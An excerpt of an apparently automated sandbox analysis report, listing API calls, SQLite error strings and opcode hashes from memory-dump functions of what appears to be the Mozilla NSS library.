                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 653623313-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0aa81ee464067ce8d8a1694c3f807b03df0857364269f500e9aaa7d49ac346fe
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5721C0BAE911155BDF01AF96DC409DE77B4AF0531CB740125E814A7B01E731EA058BE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CEFAADB,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5F72
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CE5ED8F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CE5ED9E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE5ED70: DeleteCriticalSection.KERNEL32(?), ref: 6CE5EDA4
                                                                                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CEFAADB,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5F8F
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6CEFAADB,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5FCC
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6CEFAADB,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5FD3
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6CEFAADB,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5FF4
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6CEFAADB,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF5FFB
                                                                                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CEFAADB,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF6019
                                                                                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CEFAADB,?,?,?,?,?,?,?,?,00000000,?,6CEF80C1), ref: 6CEF6036
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSection$DestroyMonitor$free
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 227462623-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 716f3508e66b18f3426b8b39540348ab5ac1597c94028d8ce8dd1d1d2d6cca7b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c1c3bb45720b52ef389ada05cba8aec6ac2a75a06010f1f33fce77d077307d92
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 716f3508e66b18f3426b8b39540348ab5ac1597c94028d8ce8dd1d1d2d6cca7b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE2138F1A05B009BEB209F75D849BD776B8AB4170CF24482CE46AC7740EB36E019CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,6CED460B,?,?), ref: 6CE63CA9
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE63CB9
                                                                                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?), ref: 6CE63CC9
                                                                                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CE63CD6
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE63CE6
                                                                                                                                                                                                                                                                                                                      • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CE63CF6
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE63D03
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE63D15
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1376842649-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 39ea4c555f555781e574233db0a5174492a04803bdcd996cf1a6cce2a1290d09
                                                                                                                                                                                                                                                                                                                      • Instruction ID: eaaff50ac9ca53b109546e336ec672b5957d5bda169f5fdfbe3d27cffc20e1c4
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39ea4c555f555781e574233db0a5174492a04803bdcd996cf1a6cce2a1290d09
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E11EC7AFA050567DB011725DC05AAB3B78EF0225CB354135ED1853B12F732DA68D7D1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE811C0: PR_NewLock.NSS3 ref: 6CE81216
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE69E17
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE69E25
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE69E4E
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE69EA2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE79500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CE79546
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE69EB6
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE69ED9
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CE69F18
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3381623595-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d711a51073fe7ce2cf1538b7a54be428eaf4e2a57e55f903a87b37a66edf5f9d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9a4a69788b280e43444f5fc612e38e1fb908b8442985ba5f7449651f0323353c
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d711a51073fe7ce2cf1538b7a54be428eaf4e2a57e55f903a87b37a66edf5f9d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF81EEB1A10601ABEB109F35DC41AABB7B9BF4524CF24452DE85987F01FB31E919C7A2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: DeleteCriticalSection.KERNEL32(D958E852,6CE81397,5B5F5EC0,?,?,6CE7B1EE,2404110F,?,?), ref: 6CE7AB3C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: free.MOZGLUE(D958E836,?,6CE7B1EE,2404110F,?,?), ref: 6CE7AB49
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: DeleteCriticalSection.KERNEL32(5D5E6D07), ref: 6CE7AB5C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: free.MOZGLUE(5D5E6CFB), ref: 6CE7AB63
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CE7AB6F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CE7AB76
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE7DCFA
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6CE7DD0E
                                                                                                                                                                                                                                                                                                                      • PK11_IsFriendly.NSS3(?), ref: 6CE7DD73
                                                                                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CE7DD8B
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE7DE81
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE7DEA6
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE7DF08
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 519503562-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 931d8c916f0873965bfd91a651190b544d0e5abafdff4f15deec6226cac6535b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3db5ab6d4e77b0067179109f5c6743e17ab37259749bf19eb837b6238a49efe4
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 931d8c916f0873965bfd91a651190b544d0e5abafdff4f15deec6226cac6535b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F491B1B9E001059BDB21CF64D881BAAB7B5EF5430CF348129DD19AB741E731EA16CBB1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6CF1BB62,00000004,6CF84CA4,?,?,00000000,?,?,6CDF31DB), ref: 6CE360AB
                                                                                                                                                                                                                                                                                                                      • sqlite3_config.NSS3(00000004,6CF84CA4,6CF1BB62,00000004,6CF84CA4,?,?,00000000,?,?,6CDF31DB), ref: 6CE360EB
                                                                                                                                                                                                                                                                                                                      • sqlite3_config.NSS3(00000012,6CF84CC4,?,?,6CF1BB62,00000004,6CF84CA4,?,?,00000000,?,?,6CDF31DB), ref: 6CE36122
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CE360A4
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CE36095
                                                                                                                                                                                                                                                                                                                      • misuse, xrefs: 6CE3609F
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_config$sqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
                                                                                                                                                                                                                                                                                                                      • API String ID: 1634735548-648709467
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 95b8e36458a8d23b97db3f1dab8e6f461ccb3ac81c3ebd3695c9b98eee4fad67
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9f3eea72575db237f6bef40fabbbc636fa104216ac5c65a7ea465a544ae8e1b5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95b8e36458a8d23b97db3f1dab8e6f461ccb3ac81c3ebd3695c9b98eee4fad67
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9B16174E1464ACFCB04CF6CC281AA9B7F0FB1F344B159199D509AB322D731AA84CF99
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CDE4FC4
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CDE51BB
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • unable to delete/modify user-function due to active statements, xrefs: 6CDE51DF
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CDE51B4
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CDE51A5
                                                                                                                                                                                                                                                                                                                      • misuse, xrefs: 6CDE51AF
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_logstrlen
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                                                                                                      • API String ID: 3619038524-4115156624
                                                                                                                                                                                                                                                                                                                      • Opcode ID: b0cce2d5b281a561ca23a326a8f1eef3388c6d69dabd84f64589068b5bb10f72
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1cb00033da1b5c9fb92e4e88733cfb1a64acf3550284363b2d2c3e601178ea2e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0cce2d5b281a561ca23a326a8f1eef3388c6d69dabd84f64589068b5bb10f72
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA71ACB5A0420ADFEB00CF55CC80B9A77B5BF4C398F144125FD199BAA1E735E950CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: __allrem
                                                                                                                                                                                                                                                                                                                      • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                                                                                                                                      • API String ID: 2933888876-3221253098
                                                                                                                                                                                                                                                                                                                      • Opcode ID: b205c87010cb8d9240176be1a34d3ae61172a0253bb7d539b6649910ca2ea124
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 16511f4a5d32d8212902d1ecf253b0091292b368f3a53b68390abf0650801f9d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b205c87010cb8d9240176be1a34d3ae61172a0253bb7d539b6649910ca2ea124
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC61C171B402049FDB44CF68DC84B6A7BB1FF4A314F64812CE919AB790DB36AD16CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6CECF165,?), ref: 6CECFF4B
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6CECF165,?), ref: 6CECFF6F
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6CECF165,?), ref: 6CECFF81
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6CECF165,?), ref: 6CECFF8D
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6CECF165,?), ref: 6CECFFA3
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6CECF165,6CF9219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CECFFC8
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6CECF165,?), ref: 6CED00A6
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 204871323-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: f623c8c39705deae4e81b348d09b8358ddcc5c457063003ef742b07b6b91d2c8
                                                                                                                                                                                                                                                                                                                      • Instruction ID: cad5cf0f32d6886a795fc0bb1327846a597f83caae955a488ad8e7b2d49737a5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f623c8c39705deae4e81b348d09b8358ddcc5c457063003ef742b07b6b91d2c8
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4351E071E00255AFDB108E98C8907AEB7B5FB49318F3A0629D925A7B40D332BC028BD1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE8DF37
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE8DF4B
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE8DF96
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CE8E02B
